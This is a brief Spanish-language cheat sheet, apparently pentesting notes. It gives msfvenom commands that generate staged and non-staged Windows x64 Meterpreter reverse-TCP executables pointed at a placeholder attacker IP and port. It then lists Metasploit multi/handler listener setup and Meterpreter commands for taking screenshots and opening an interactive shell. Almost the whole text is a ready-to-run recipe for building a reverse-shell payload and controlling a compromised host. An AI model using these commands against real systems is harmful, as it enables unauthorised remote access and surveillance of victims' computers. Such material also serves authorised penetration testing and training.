Comando:
msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP_ATACANTE> LPORT=<PUERTO> -f <FORMATO> -o payload_staged.exe
Uso en Metasploit:
Iniciar base de datos:
msfdb run
Configurar listener:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <IP_ATACANTE>
set LPORT <PUERTO>
run
Herramientas:
screenshot: Captura de pantalla.shell: Consola interactiva.Comando:
msfvenom -p windows/x64/meterpreter_reverse_tcp --platform windows -a x64 LHOST=<IP_ATACANTE> LPORT=<PUERTO> -f <FORMATO> -o payload_nonstaged.exe
Configuración en Metasploit: Igual al payload staged, pero con:
set payload windows/x64/meterpreter_reverse_tcp